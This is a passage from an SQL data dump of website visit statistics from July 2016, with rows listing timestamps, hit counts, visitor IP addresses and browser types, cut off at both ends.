','chrome'),(49953,1469009089,1,1,0,0,'91.196.178.131','firefox'),(49954,1469009547,1,1,0,0,'151.80.31.155','other'),(49955,1469009644,1,1,0,0,'157.55.39.144','other'),(49956,1469009793,1,1,0,0,'176.118.48.12','chrome'),(49957,1469010146,1,1,0,0,'66.249.78.164','chrome'),(49958,1469011222,1,1,0,0,'217.69.133.228','other'),(49959,1469011353,1,0,1,0,'66.249.69.152',''),(49960,1469011813,1,1,0,0,'93.158.152.84','other'),(49961,1469011912,1,1,0,0,'141.8.142.67','other'),(49962,1469012135,1,0,1,0,'66.249.78.171',''),(49963,1469012494,1,0,1,0,'66.249.78.164',''),(49964,1469014250,2,2,0,0,'141.8.183.25','other'),(49965,1469014410,1,1,0,0,'91.196.178.70','firefox'),(49966,1469014998,1,1,0,0,'46.201.164.73','chrome'),(49967,1469015511,1,0,1,0,'66.249.78.164',''),(49968,1469015614,1,1,0,0,'91.196.178.70','firefox'),(49969,1469015626,1,1,0,0,'91.196.178.67','firefox'),(49970,1469016698,1,1,0,0,'91.196.178.67','chrome'),(49971,1469016718,1,1,0,0,'141.8.183.25','other'),(49972,1469016983,1,0,1,0,'66.249.78.164',''),(49973,1469017000,1,0,1,0,'66.249.69.189',''),(49974,1469017802,2,2,0,0,'46.174.126.143','firefox'),(49975,1469018174,1,1,0,0,'213.179.252.107','firefox'),(49976,1469018697,1,1,0,0,'91.124.236.53','chrome'),(49977,1469018755,1,1,0,0,'46.174.126.143','firefox'),(49978,1469018883,1,1,0,0,'91.196.178.163','chrome'),(49979,1469019070,18,18,0,0,'209.58.178.49','other'),(49980,1469019277,1,1,0,0,'51.255.65.6','other'),(49981,1469019435,1,1,0,0,'94.179.51.211','chrome'),(49982,1469019449,1,0,1,0,'68.180.230.178',''),(49983,1469019481,1,0,1,0,'66.249.78.178',''),(49984,1469019704,1,1,0,0,'164.132.161.64','other'),(49985,1469020088,2,2,0,0,'144.76.29.162','other'),(49986,1469020832,2,2,0,0,'71.115.171.78','other'),(49987,1469021698,1,1,0,0,'46.201.164.73','chrome'),(49988,1469021713,1,1,0,0,'130.193.50.34','other'),(49989,1469021716,3,3,0,0,'141.8.183.25','other'),(49990,1469021978,1,1,0,0,'85.238.111.31','chrome'),(49991,1469023634,1,0,1,0,'66.249.78.164',''),(49992,1469023844,1,1,0,0,'66.249.78.164','chrome'),(49993,1469024202,1,1,0,0,'185.3.150.231','chrome'),(49994,1469025680,1,1,0,0,'51.255.65.2','other'),(49995,1469025841,1,1,0,0,'141.8.142.58','other'),(49996,1469025930,1,1,0,0,'95.135.54.17','chrome'),(49997,1469026426,1,1,0,0,'151.80.31.161','other'),(49998,1469026625,1,0,1,0,'66.249.78.136',''),(49999,1469027416,1,1,0,0,'180.76.15.152','other'),(50000,1469027642,1,0,1,0,'66.249.78.164',''),(50001,1469029612,1,1,0,0,'207.46.13.118','other'),(50002,1469029700,1,1,0,0,'51.255.65.31','other'),(50003,1469030755,1,1,0,0,'51.255.65.48','other'),(50004,1469031438,1,1,0,0,'180.76.15.18','other'),(50005,1469031894,4,4,0,0,'88.198.230.79','other'),(50006,1469032075,1,1,0,0,'94.179.107.7','firefox'),(50007,1469032307,1,1,0,0,'51.255.65.63','other'),(50008,1469033253,1,1,0,0,'91.196.178.66','firefox'),(50009,1469033446,1,1,0,0,'180.76.15.148','other'),(50010,1469034158,144,144,0,0,'69.30.210.242','other'),(50011,1469034568,1,1,0,0,'141.8.142.61','other'),(50012,1469034657,1,1,0,0,'141.8.142.58','other'),(50013,1469035453,1,1,0,0,'180.76.15.150','other'),(50014,1469035513,1,1,0,0,'130.193.50.34','other'),(50015,1469035649,1,1,0,0,'176.77.83.122','chrome'),(50016,1469035738,1,1,0,0,'164.132.161.9','other'),(50017,1469036615,1,1,0,0,'208.115.113.82','other'),(50018,1469036871,1,1,0,0,'5.255.253.67','other'),(50019,1469038445,1,1,0,0,'130.193.50.34','other'),(50020,1469039157,1,0,1,0,'66.249.66.177',''),(50021,1469039164,2,2,0,0,'141.8.142.58','other'),(50022,1469039669,1,1,0,0,'66.249.66.182','chrome'),(50023,1469040188,2,2,0,0,'141.8.142.67','other'),(50024,1469040295,1,1,0,0,'130.193.51.19','other'),(50025,1469040458,1,1,0,0,'141.8.142.61','other'),(50026,1469040654,1,1,0,0,'91.196.178.163','firefox'),(50027,1469040845,1,1,0,0,'128.68.60.96','msie'),(50028,1469041475,2,0,2,0,'66.249.66.180',''),(50029,1469041553,1,1,0,0,'141.8.142.58','other'),(50030,1469041655,1,1,0,0,'130.193.51.19','other'),(50031,1469041711,1,1,0,0,'51.255.65.85','other'),(50032,1469042165,1,1,0,0,'93.158.152.84','other'),(50033,1469042202,1,1,0,0,'37.139.167.254','chrome'),(50034,1469042367,1,1,0,0,'130.193.50.34','other'),(50035,1469042408,1,0,1,0,'66.249.66.183',''),(50036,1469042864,1,1,0,0,'185.26.182.31','opera'),(50037,1469043430,1,1,0,0,'91.196.178.36','chrome'),(50038,1469043484,1,1,0,0,'180.76.15.23','other'),(50039,1469043549,1,1,0,0,'51.255.65.32','other'),(50040,1469044258,1,1,0,0,'164.132.161.41','other'),(50041,1469044714,1,0,1,0,'68.180.230.111',''),(50042,1469045022,1,1,0,0,'151.80.31.180','other'),(50043,1469046593,1,1,0,0,'207.46.13.118','other'),(50044,1469047389,1,0,1,0,'66.249.69.155',''),(50045,1469047502,1,1,0,0,'180.76.15.17','other'),(50046,1469047893,1,0,1,0,'66.249.66.177',''),(50047,1469049165,1,0,1,0,'66.249.66.183',''),(50048,1469049480,1,1,0,0,'151.80.31.168','other'),(50049,1469052254,1,1,0,0,'141.8.142.25','other'),(50050,1469052256,1,1,0,0,'178.154.149.10','other'),(50051,1469052415,1,1,0,0,'207.46.13.118','other'),(50052,1469054340,1,1,0,0,'130.193.51.19','other'),(50053,1469054343,1,1,0,0,'130.193.50.34','other'),(50054,1469055134,1,1,0,0,'51.255.65.63','other'),(50055,1469056671,1,1,0,0,'37.115.238.226','firefox'),(50056,1469057772,1,1,0,0,'164.132.161.91','other'),(50057,1469058984,1,1,0,0,'46.42.163.100','chrome'),(50059,1469058985,1,1,0,0,'37.204.71.76','chrome'),(50060,1469058989,1,1,0,0,'37.110.37.49','msie'),(50061,1469058990,1,1,0,0,'188.32.237.124','chrome'),(50062,1469060564,1,1,0,0,'208.115.113.82','other'),(50063,1469061849,1,1,0,0,'5.255.253.68','other'),(50064,1469062259,1,1,0,0,'51.255.65.39','other'),(50065,1469063399,1,1,0,0,'164.132.161.49','other'),(50066,1469063526,1,1,0,0,'207.46.13.118','other'),(50067,1469063773,1,1,0,0,'141.8.183.19','other'),(50068,1469065031,1,0,1,0,'66.249.66.180',''),(50069,1469065085,1,1,0,0,'66.249.66.188','chrome'),(50070,1469065200,1,1,0,0,'66.249.66.182','chrome'),(50071,1469065262,2,2,0,0,'66.249.66.185','chrome'),(50072,1469065603,1,1,0,0,'164.132.161.88','other'),(50073,1469067243,1,1,0,0,'176.77.0.65','msie'),(50074,1469067245,1,1,0,0,'176.77.1.131','msie'),(50075,1469067246,1,1,0,0,'95.27.33.42','msie'),(50076,1469067247,1,1,0,0,'176.193.96.166','msie'),(50077,1469067262,1,1,0,0,'95.24.125.26','msie'),(50078,1469069591,1,1,0,0,'207.46.13.118','other'),(50079,1469071186,1,1,0,0,'151.80.31.174','other'),(50080,1469072819,1,1,0,0,'180.76.15.145','other'),(50081,1469073498,1,0,1,0,'66.249.66.185',''),(50082,1469074608,1,1,0,0,'141.8.142.67','other'),(50083,1469075244,3,0,3,0,'68.180.230.111',''),(50084,1469075477,1,1,0,0,'208.115.113.82','other'),(50085,1469077370,6,0,6,0,'68.180.230.111',''),(50086,1469077734,1,1,0,0,'78.111.215.131','opera'),(50087,1469078261,1,1,0,0,'208.115.113.92','other'),(50088,1469078541,1,0,1,0,'68.180.230.111',''),(50089,1469079006,1,1,0,0,'66.249.93.117','chrome'),(50090,1469080191,1,1,0,0,'91.196.178.70','firefox'),(50091,1469080605,1,1,0,0,'141.8.132.10','other'),(50092,1469081058,1,1,0,0,'194.126.182.179','chrome'),(50093,1469082413,1,1,0,0,'91.196.178.72','chrome'),(50094,1469082435,2,0,2,0,'66.249.66.180',''),(50095,1469082976,1,1,0,0,'94.179.4.84','firefox'),(50096,1469083074,1,1,0,0,'37.55.251.69','chrome'),(50097,1469083309,1,1,0,0,'37.54.193.241','firefox'),(50098,1469083355,1,1,0,0,'208.115.113.92','other'),(50099,1469083584,1,0,1,0,'66.249.66.185',''),(50100,1469084132,1,1,0,0,'91.196.178.130','firefox'),(50101,1469084499,1,1,0,0,'185.43.251.181','chrome'),(50102,1469084620,1,1,0,0,'46.175.72.217','firefox'),(50103,1469084654,1,1,0,0,'141.8.142.25','other'),(50104,1469084770,1,1,0,0,'94.179.13.83','chrome'),(50105,1469084888,1,1,0,0,'207.46.13.118','other'),(50106,1469086576,1,1,0,0,'176.111.33.18','firefox'),(50107,1469086919,1,1,0,0,'37.54.193.241','firefox'),(50108,1469087030,1,1,0,0,'91.196.177.94','firefox'),(50109,1469087066,1,1,0,0,'208.115.113.82','other'),(50110,1469087360,1,1,0,0,'91.196.178.70','firefox'),(50111,1469087570,2,2,0,0,'91.196.178.69','chrome'),(50112,1469088014,1,1,0,0,'91.196.177.94','firefox'),(50113,1469088145,1,1,0,0,'37.54.193.241','firefox'),(50114,1469088373,1,1,0,0,'207.46.13.118','other'),(50115,1469089136,8,8,0,0,'5.9.123.116','other'),(50116,1469089606,1,0,1,0,'66.249.66.180',''),(50117,1469089747,2,2,0,0,'174.34.135.242','other'),(50118,1469089933,1,1,0,0,'195.68.216.88','chrome'),(50119,1469090179,1,0,1,0,'66.249.66.188',''),(50120,1469090232,1,0,1,0,'66.249.66.185',''),(50121,1469090329,1,1,0,0,'195.162.82.89','chrome'),(50122,1469090998,3,3,0,0,'91.196.178.70','firefox'),(50123,1469091173,1,1,0,0,'91.196.178.68','firefox'),(50124,1469091384,1,0,1,0,'66.249.66.180',''),(50125,1469091385,1,1,0,0,'31.13.102.108','other'),(50126,1469091391,1,1,0,0,'31.13.100.118','other'),(50127,1469091472,1,1,0,0,'95.213.6.72','other'),(50128,1469091483,1,0,1,0,'68.180.230.178',''),(50129,1469091511,1,1,0,0,'37.53.228.197','firefox'),(50130,1469091856,1,1,0,0,'91.196.177.15','chrome'),(50131,1469091882,1,1,0,0,'91.196.179.33','chrome'),(50132,1469091937,1,1,0,0,'208.115.113.92','other'),(50133,1469092467,1,1,0,0,'91.196.178.70','chrome'),(50134,1469092528,2,2,0,0,'91.196.178.39','firefox'),(50135,1469092546,1,1,0,0,'109.108.88.38','firefox'),(50136,1469092557,1,1,0,0,'91.196.178.40','chrome'),(50137,1469092571,2,2,0,0,'91.196.178.67','firefox'),(50138,1469092572,1,1,0,0,'46.211.114.128','other'),(50139,1469092578,1,1,0,0,'130.180.216.246','chrome'),(50140,1469092600,1,1,0,0,'213.133.170.195','other'),(50142,1469092602,1,1,0,0,'91.196.178.161','chrome'),(50143,1469092610,2,2,0,0,'66.249.93.113','chrome'),(50144,1469092628,1,1,0,0,'91.196.177.131','chrome'),(50145,1469092635,1,1,0,0,'213.179.252.146','chrome'),(50146,1469092638,1,1,0,0,'91.196.178.65','chrome'),(50147,1469092641,1,1,0,0,'178.95.244.126','chrome'),(50148,1469092651,1,1,0,0,'37.73.249.28','chrome'),(50149,1469092669,1,1,0,0,'95.134.220.216','chrome'),(50150,1469092676,1,1,0,0,'78.111.189.203','chrome'),(50151,1469092681,1,1,0,0,'91.196.178.98','chrome'),(50152,1469092686,1,1,0,0,'37.73.253.124','chrome'),(50153,1469092694,1,1,0,0,'195.142.143.203','chrome'),(50154,1469092726,2,2,0,0,'91.196.178.66','chrome'),(50155,1469092753,1,1,0,0,'176.105.211.196','chrome'),(50156,1469092757,1,1,0,0,'95.134.117.63','chrome'),(50157,1469092759,1,1,0,0,'91.196.178.69','firefox'),(50158,1469092775,1,1,0,0,'37.73.235.144','chrome'),(50159,1469092789,1,1,0,0,'37.53.230.125','chrome'),(50160,1469092801,1,1,0,0,'141.0.15.239','other'),(50161,1469092806,1,1,0,0,'82.145.218.31','other'),(50162,1469092846,1,1,0,0,'37.73.241.255','other'),(50163,1469092854,1,1,0,0,'94.179.33.118','other'),(50164,1469092875,1,1,0,0,'91.196.178.167','chrome'),(50165,1469092944,1,1,0,0,'54.244.48.20','msie'),(50166,1469092962,1,1,0,0,'37.53.224.39','chrome'),(50167,1469092972,1,1,0,0,'95.108.133.229','chrome'),(50168,1469092981,1,1,0,0,'46.211.153.152','chrome'),(50169,1469093010,1,1,0,0,'91.196.177.28','chrome'),(50170,1469093053,1,1,0,0,'168.235.205.42','other'),(50171,1469093069,1,1,0,0,'82.145.218.202','other'),(50172,1469093080,1,1,0,0,'37.73.250.11','chrome'),(50173,1469093081,1,1,0,0,'141.0.14.160','other'),(50174,1469093091,1,1,0,0,'37.73.197.72','chrome'),(50175,1469093095,1,1,0,0,'82.145.208.36','other'),(50176,1469093109,1,1,0,0,'46.201.90.97','other'),(50177,1469093130,1,1,0,0,'95.134.117.103','chrome'),(50178,1469093195,1,1,0,0,'37.73.222.47','chrome'),(50179,1469093201,1,1,0,0,'195.211.173.215','chrome'),(50180,1469093208,1,1,0,0,'85.115.58.180','other'),(50181,1469093228,1,1,0,0,'141.0.15.87','other'),(50182,1469093242,1,1,0,0,'37.73.244.89','other'),(50184,1469093246,1,1,0,0,'91.196.177.91','firefox'),(50185,1469093252,1,1,0,0,'91.196.178.35','chrome'),(50186,1469093261,1,1,0,0,'176.38.31.77','chrome'),(50187,1469093275,1,1,0,0,'91.196.178.66','other'),(50188,1469093276,1,1,0,0,'91.193.166.97','chrome'),(50189,1469093291,2,2,0,0,'91.196.178.38','chrome'),(50190,1469093294,1,1,0,0,'93.126.122.225','chrome'),(50191,1469093300,1,1,0,0,'37.73.231.42','chrome'),(50192,1469093304,1,1,0,0,'46.211.69.122','chrome'),(50193,1469093322,2,2,0,0,'91.196.178.38','firefox'),(50194,1469093323,1,1,0,0,'94.244.169.244','chrome'),(50195,1469093350,1,1,0,0,'37.73.254.249','chrome'),(50196,1469093351,1,1,0,0,'188.163.71.200','chrome'),(50197,1469093362,1,1,0,0,'37.73.199.205','chrome'),(50198,1469093380,1,1,0,0,'92.112.124.208','chrome'),(50199,1469093417,1,1,0,0,'37.73.236.36','chrome'),(50200,1469093445,1,1,0,0,'94.178.146.228','chrome'),(50201,1469093457,1,1,0,0,'91.196.178.39','firefox'),(50202,1469093470,1,1,0,0,'91.196.178.104','chrome'),(50203,1469093484,1,1,0,0,'178.92.251.184','chrome'),(50204,1469093506,1,1,0,0,'46.211.114.179','other'),(50205,1469093508,1,1,0,0,'95.134.185.162','chrome'),(50206,1469093509,1,1,0,0,'80.70.75.124','chrome'),(50207,1469093514,1,1,0,0,'37.73.247.33','other'),(50208,1469093528,1,1,0,0,'91.196.178.164','chrome'),(50209,1469093531,1,1,0,0,'119.147.146.189','chrome'),(50210,1469093532,1,1,0,0,'91.196.177.40','chrome'),(50211,1469093538,1,1,0,0,'119.147.146.193','chrome'),(50212,1469093573,1,1,0,0,'46.133.137.18','other'),(50213,1469093583,1,1,0,0,'8.37.235.228','other'),(50214,1469093596,1,1,0,0,'37.73.222.144','other'),(50215,1469093624,1,1,0,0,'91.196.177.59','other'),(50216,1469093628,1,1,0,0,'37.73.224.33','chrome'),(50217,1469093632,1,1,0,0,'141.0.14.187','other'),(50218,1469093643,1,1,0,0,'91.235.71.229','other'),(50219,1469093658,1,1,0,0,'46.211.138.45','other'),(50220,1469093663,1,1,0,0,'91.196.178.67','chrome'),(50221,1469093693,1,1,0,0,'91.196.178.69','chrome'),(50222,1469093695,1,1,0,0,'46.133.24.148','other'),(50224,1469093716,1,1,0,0,'178.95.158.128','chrome'),(50225,1469093750,1,1,0,0,'94.179.246.119','chrome'),(50226,1469093762,1,1,0,0,'8.37.232.121','other'),(50227,1469093770,2,2,0,0,'91.196.178.133','chrome'),(50228,1469093775,1,1,0,0,'91.196.178.72','chrome'),(50229,1469093807,2,2,0,0,'91.196.178.98','chrome'),(50230,1469093841,1,1,0,0,'37.73.209.109','chrome'),(50231,1469093845,1,1,0,0,'91.196.178.166','chrome'),(50232,1469093858,1,1,0,0,'91.196.178.65','chrome'),(50233,1469093861,1,1,0,0,'46.211.203.9','chrome'),(50234,1469093873,1,1,0,0,'37.73.212.28','chrome'),(50235,1469093881,1,1,0,0,'178.94.172.217','chrome'),(50236,1469093893,1,1,0,0,'91.196.178.169','firefox'),(50237,1469093924,1,1,0,0,'37.73.254.158','chrome'),(50238,1469093955,1,1,0,0,'178.92.8.229','other'),(50239,1469094004,1,1,0,0,'193.169.127.17','chrome'),(50240,1469094010,1,1,0,0,'91.196.178.135','chrome'),(50241,1469094027,1,0,1,0,'66.249.66.183',''),(50242,1469094045,1,1,0,0,'37.73.241.163','chrome'),(50243,1469094059,1,1,0,0,'37.73.212.21','chrome'),(50244,1469094063,1,1,0,0,'93.72.165.234','chrome'),(50245,1469094078,1,1,0,0,'130.180.220.225','chrome'),(50246,1469094089,1,1,0,0,'178.216.9.173','firefox'),(50247,1469094095,1,1,0,0,'208.115.113.92','other'),(50248,1469094106,1,1,0,0,'94.179.69.45','chrome'),(50249,1469094110,1,1,0,0,'37.73.197.190','other'),(50250,1469094129,1,1,0,0,'47.16.91.216','chrome'),(50251,1469094177,1,1,0,0,'94.179.209.83','chrome'),(50252,1469094184,1,1,0,0,'37.73.221.169','chrome'),(50253,1469094186,1,1,0,0,'91.196.178.100','chrome'),(50254,1469094194,1,1,0,0,'37.73.219.177','chrome'),(50255,1469094197,1,1,0,0,'37.73.252.76','other'),(50256,1469094198,1,1,0,0,'91.196.178.134','firefox'),(50257,1469094206,1,1,0,0,'37.73.208.163','other'),(50258,1469094211,1,1,0,0,'91.196.178.70','firefox'),(50259,1469094241,1,1,0,0,'91.196.177.26','chrome'),(50261,1469094248,1,1,0,0,'95.132.169.30','chrome'),(50262,1469094256,1,1,0,0,'91.196.178.162','firefox'),(50263,1469094259,1,1,0,0,'91.196.178.168','chrome'),(50264,1469094278,1,1,0,0,'37.73.211.13','other'),(50265,1469094297,1,1,0,0,'92.113.127.184','chrome'),(50266,1469094365,1,1,0,0,'37.55.226.172','chrome'),(50267,1469094367,1,1,0,0,'37.52.16.82','chrome'),(50268,1469094369,2,2,0,0,'91.196.178.130','chrome'),(50269,1469094409,1,1,0,0,'37.73.204.49','chrome'),(50270,1469094470,1,1,0,0,'91.196.178.103','chrome'),(50271,1469094485,1,1,0,0,'178.92.170.23','other'),(50272,1469094560,1,1,0,0,'82.145.209.122','other'),(50273,1469094563,1,1,0,0,'37.73.230.230','chrome'),(50274,1469094571,1,1,0,0,'141.0.14.89','other'),(50275,1469094659,1,1,0,0,'37.73.206.55','chrome'),(50276,1469094664,1,1,0,0,'37.73.208.255','other'),(50277,1469094719,1,1,0,0,'95.134.170.20','chrome'),(50278,1469094737,1,1,0,0,'168.235.205.19','other'),(50279,1469094739,1,1,0,0,'66.249.93.117','chrome'),(50280,1469094744,1,1,0,0,'94.178.6.58','chrome'),(50281,1469094773,1,1,0,0,'141.0.15.249','other'),(50282,1469094799,1,1,0,0,'95.158.49.153','chrome'),(50283,1469094850,1,1,0,0,'37.54.19.140','chrome'),(50284,1469094864,2,2,0,0,'91.196.178.165','chrome'),(50285,1469094870,1,1,0,0,'178.95.157.192','other'),(50286,1469094876,3,3,0,0,'91.196.178.70','chrome'),(50287,1469094914,1,1,0,0,'82.145.210.246','other'),(50288,1469094928,1,1,0,0,'37.73.221.202','chrome'),(50289,1469094946,1,1,0,0,'217.118.81.234','chrome'),(50290,1469094953,1,1,0,0,'37.73.224.123','chrome'),(50291,1469094981,1,1,0,0,'82.145.208.42','other'),(50292,1469095047,2,2,0,0,'91.196.178.67','chrome'),(50293,1469095048,1,0,1,0,'66.249.66.183',''),(50294,1469095084,2,2,0,0,'46.4.32.75','other'),(50295,1469095105,1,1,0,0,'91.196.178.136','chrome'),(50296,1469095137,1,1,0,0,'95.135.213.214','chrome'),(50297,1469095140,1,1,0,0,'37.73.246.173','chrome'),(50298,1469095155,1,1,0,0,'91.196.178.134','chrome'),(50299,1469095230,1,1,0,0,'91.196.178.97','chrome'),(50300,1469095241,1,1,0,0,'82.207.108.73','chrome'),(50301,1469095306,1,1,0,0,'82.145.216.193','other'),(50302,1469095316,1,1,0,0,'37.73.203.98','chrome'),(50304,1469095319,1,1,0,0,'178.93.148.136','chrome'),(50305,1469095326,1,1,0,0,'91.196.178.98','chrome'),(50306,1469095331,1,1,0,0,'95.135.90.185','other'),(50307,1469095466,1,1,0,0,'91.196.178.37','firefox'),(50308,1469095472,2,2,0,0,'91.196.178.39','chrome'),(50309,1469095505,1,1,0,0,'91.196.178.131','chrome'),(50310,1469095516,1,1,0,0,'95.135.212.14','chrome'),(50311,1469095569,1,1,0,0,'95.134.220.77','chrome'),(50312,1469095650,1,1,0,0,'37.52.21.190','chrome'),(50313,1469095671,1,1,0,0,'94.179.82.5','other'),(50314,1469095710,1,1,0,0,'37.73.210.5','chrome'),(50315,1469095717,1,1,0,0,'91.196.178.101','chrome'),(50316,1469095719,1,1,0,0,'91.196.178.66','chrome'),(50317,1469095723,1,1,0,0,'92.52.188.244','chrome'),(50318,1469095724,1,1,0,0,'141.0.14.33','other'),(50319,1469095730,1,1,0,0,'37.73.196.51','chrome'),(50320,1469095736,1,1,0,0,'37.73.207.105','other'),(50321,1469095775,1,1,0,0,'178.92.251.147','chrome'),(50322,1469095815,1,1,0,0,'91.196.178.70','firefox'),(50323,1469095843,2,2,0,0,'94.179.50.114','chrome'),(50324,1469095845,2,2,0,0,'66.249.93.109','chrome'),(50325,1469095857,1,1,0,0,'91.196.178.38','chrome'),(50326,1469095874,1,1,0,0,'37.53.228.75','chrome'),(50327,1469095906,1,1,0,0,'8.37.230.21','other'),(50328,1469095954,1,1,0,0,'95.134.221.25','chrome'),(50329,1469095958,1,1,0,0,'46.211.3.255','chrome'),(50330,1469096025,1,1,0,0,'178.92.249.83','other'),(50331,1469096045,1,1,0,0,'91.196.178.71','chrome'),(50332,1469096102,1,1,0,0,'91.196.178.167','chrome'),(50333,1469096110,1,1,0,0,'91.196.178.166','chrome'),(50334,1469096116,1,1,0,0,'37.73.242.203','msie'),(50335,1469096136,1,1,0,0,'91.196.178.67','other'),(50336,1469096166,1,1,0,0,'37.73.250.200','chrome'),(50337,1469096167,1,1,0,0,'46.133.23.78','chrome'),(50338,1469096170,1,1,0,0,'95.134.221.0','other'),(50339,1469096197,1,1,0,0,'46.211.1.156','chrome'),(50340,1469096201,1,1,0,0,'95.133.238.229','chrome'),(50341,1469096215,1,1,0,0,'37.73.249.226','chrome'),(50342,1469096217,1,1,0,0,'37.52.16.82','other'),(50343,1469096244,1,1,0,0,'37.73.245.139','chrome'),(50344,1469096258,2,2,0,0,'91.196.178.129','other'),(50345,1469096269,1,1,0,0,'91.196.178.169','chrome'),(50346,1469096271,1,1,0,0,'176.96.197.72','chrome'),(50347,1469096348,1,1,0,0,'91.196.178.68','chrome'),(50348,1469096365,1,1,0,0,'185.30.202.125','firefox'),(50349,1469096376,1,1,0,0,'46.211.0.177','chrome'),(50350,1469096440,1,1,0,0,'141.0.14.190','other'),(50351,1469096447,1,1,0,0,'46.211.69.125','chrome'),(50352,1469096449,1,1,0,0,'92.60.190.165','chrome'),(50353,1469096497,1,1,0,0,'91.196.178.69','chrome'),(50354,1469096516,1,1,0,0,'178.93.148.244','chrome'),(50355,1469096517,1,1,0,0,'37.73.243.97','chrome'),(50356,1469096519,1,1,0,0,'91.196.178.69','other'),(50357,1469096528,1,1,0,0,'81.23.24.129','other'),(50358,1469096625,1,1,0,0,'81.23.24.138','other'),(50359,1469096636,1,1,0,0,'141.0.14.200','other'),(50360,1469096666,1,1,0,0,'91.196.178.132','chrome'),(50361,1469096671,1,1,0,0,'141.0.15.46','other'),(50362,1469096689,1,1,0,0,'94.179.39.30','chrome'),(50363,1469096751,1,1,0,0,'91.196.178.164','firefox'),(50364,1469096758,1,1,0,0,'37.52.19.14','chrome'),(50365,1469096761,1,1,0,0,'93.75.222.64','chrome'),(50366,1469096792,1,1,0,0,'46.133.62.99','other'),(50367,1469096864,1,1,0,0,'46.211.155.39','chrome'),(50368,1469096880,1,1,0,0,'91.196.178.99','other'),(50369,1469096898,1,1,0,0,'95.135.212.144','firefox'),(50370,1469096925,1,1,0,0,'37.73.204.171','chrome'),(50371,1469096936,2,2,0,0,'91.196.178.40','chrome'),(50372,1469096956,1,1,0,0,'95.134.185.54','chrome'),(50373,1469096968,1,1,0,0,'178.92.249.88','chrome'),(50374,1469097007,1,1,0,0,'94.179.83.163','chrome'),(50376,1469097019,1,1,0,0,'37.54.17.168','chrome'),(50377,1469097028,1,1,0,0,'141.0.14.118','other'),(50378,1469097029,1,1,0,0,'141.0.14.33','other'),(50379,1469097067,1,1,0,0,'91.196.178.136','chrome'),(50380,1469097078,2,2,0,0,'91.196.178.131','chrome'),(50381,1469097082,1,1,0,0,'91.196.177.89','chrome'),(50382,1469097117,1,1,0,0,'91.196.178.166','chrome'),(50383,1469097137,1,1,0,0,'46.211.114.159','other'),(50384,1469097140,1,1,0,0,'37.73.250.38','chrome'),(50385,1469097147,1,1,0,0,'37.54.22.242','chrome'),(50386,1469097163,1,1,0,0,'178.92.249.225','chrome'),(50387,1469097171,1,1,0,0,'188.68.178.147','chrome'),(50388,1469097181,1,1,0,0,'91.196.178.134','other'),(50389,1469097196,1,1,0,0,'37.73.193.204','chrome'),(50390,1469097211,1,1,0,0,'176.97.1.114','other'),(50391,1469097281,2,2,0,0,'91.196.178.37','chrome'),(50392,1469097295,1,1,0,0,'81.23.24.138','chrome'),(50393,1469097315,1,1,0,0,'95.134.238.220','other'),(50394,1469097364,1,1,0,0,'46.133.129.9','chrome'),(50395,1469097365,1,1,0,0,'92.112.104.148','chrome'),(50396,1469097392,1,1,0,0,'77.91.171.197','chrome'),(50397,1469097402,1,1,0,0,'176.96.198.211','other'),(50398,1469097428,1,1,0,0,'81.23.24.142','chrome'),(50399,1469097498,1,1,0,0,'37.73.244.158','chrome'),(50400,1469097504,1,1,0,0,'91.196.178.99','chrome'),(50401,1469097506,1,1,0,0,'37.73.202.16','chrome'),(50402,1469097512,1,1,0,0,'46.211.4.67','chrome'),(50403,1469097543,1,1,0,0,'141.0.14.91','other'),(50404,1469097551,1,1,0,0,'82.145.216.77','other'),(50405,1469097576,1,1,0,0,'95.158.62.51','chrome'),(50406,1469097620,1,1,0,0,'91.196.177.129','chrome'),(50407,1469097708,1,1,0,0,'207.46.13.118','other'),(50408,1469097762,1,1,0,0,'91.196.178.166','other'),(50409,1469097804,1,1,0,0,'37.73.245.139','chrome'),(50410,1469097830,2,2,0,0,'91.196.178.134','chrome'),(50411,1469097853,1,1,0,0,'37.53.227.103','other'),(50412,1469097877,1,1,0,0,'91.196.176.13','chrome'),(50414,1469097887,1,1,0,0,'91.196.178.134','firefox'),(50415,1469097912,1,1,0,0,'94.179.127.247','chrome'),(50416,1469097940,1,1,0,0,'37.73.225.255','other'),(50417,1469097947,1,1,0,0,'95.158.42.241','chrome'),(50418,1469097991,1,1,0,0,'46.211.141.245','chrome'),(50419,1469098000,1,1,0,0,'95.134.171.140','chrome'),(50420,1469098005,1,1,0,0,'37.73.244.132','chrome'),(50421,1469098044,1,1,0,0,'37.53.226.209','chrome'),(50422,1469098046,1,1,0,0,'82.145.211.84','other'),(50423,1469098080,1,1,0,0,'37.73.218.194','chrome'),(50424,1469098109,1,1,0,0,'91.196.178.167','chrome'),(50425,1469098118,1,1,0,0,'91.196.178.168','chrome'),(50426,1469098229,1,1,0,0,'37.54.22.210','chrome'),(50427,1469098233,1,1,0,0,'46.211.154.171','chrome'),(50428,1469098283,1,1,0,0,'37.73.208.12','other'),(50429,1469098382,1,1,0,0,'46.133.70.210','chrome'),(50430,1469098384,1,1,0,0,'94.179.40.32','chrome'),(50431,1469098432,1,1,0,0,'95.135.240.152','chrome'),(50432,1469098454,1,1,0,0,'91.196.178.136','chrome'),(50433,1469098479,1,1,0,0,'91.196.178.97','other'),(50434,1469098490,1,1,0,0,'94.179.77.156','chrome'),(50435,1469098498,1,1,0,0,'141.0.15.209','other'),(50436,1469098502,1,1,0,0,'141.0.14.162','other'),(50437,1469098504,1,1,0,0,'82.145.211.25','other'),(50438,1469098573,1,1,0,0,'92.112.124.86','other'),(50439,1469098580,1,1,0,0,'37.73.252.100','chrome'),(50440,1469098620,1,1,0,0,'91.196.178.40','chrome'),(50441,1469098635,1,1,0,0,'91.196.178.70','chrome'),(50442,1469098679,1,1,0,0,'91.196.178.134','other'),(50443,1469098716,1,1,0,0,'141.0.14.52','other'),(50444,1469098754,1,1,0,0,'37.73.225.27','chrome'),(50445,1469098805,1,1,0,0,'91.196.178.131','chrome'),(50446,1469098810,1,1,0,0,'95.132.127.206','opera'),(50447,1469098854,1,1,0,0,'178.151.234.149','other'),(50448,1469098855,1,1,0,0,'46.133.87.192','chrome'),(50449,1469098888,1,1,0,0,'94.178.7.27','chrome'),(50450,1469098908,1,1,0,0,'91.196.178.100','chrome'),(50451,1469098936,1,1,0,0,'95.158.42.241','chrome'),(50452,1469098952,1,1,0,0,'37.73.209.218','other'),(50453,1469098967,1,1,0,0,'37.52.114.81','other'),(50454,1469099100,1,1,0,0,'178.92.8.205','chrome'),(50455,1469099152,1,1,0,0,'141.0.14.128','other'),(50457,1469099171,1,1,0,0,'82.145.219.190','other'),(50458,1469099205,1,1,0,0,'46.133.176.213','other'),(50459,1469099211,1,1,0,0,'37.73.230.73','chrome'),(50460,1469